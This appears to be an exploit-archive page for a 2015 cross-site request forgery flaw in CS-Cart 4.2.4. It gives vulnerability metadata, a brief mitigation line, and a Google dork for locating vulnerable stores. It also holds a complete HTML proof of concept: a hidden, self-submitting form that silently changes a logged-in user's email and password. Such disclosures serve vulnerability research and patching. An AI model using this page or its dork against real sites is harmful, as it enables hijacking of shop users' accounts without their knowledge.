CS-Cart 4.2.4 CSRF

vendor:

CS-Cart

by:

Luis Santana

6.8

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: CS-Cart

Affected Version From: 4.2.2004

Affected Version To: 4.2.2004

Patch Exists: NO

Related CWE: N/A

CPE: a:cs-cart:cs-cart:4.2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux + PHP

2015

Standard CSRF, allow you to change a users's password.

Mitigation:

Implementing CSRF protection tokens, validating input, and using secure communication protocols.

Source

Exploit-DB raw data:

# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground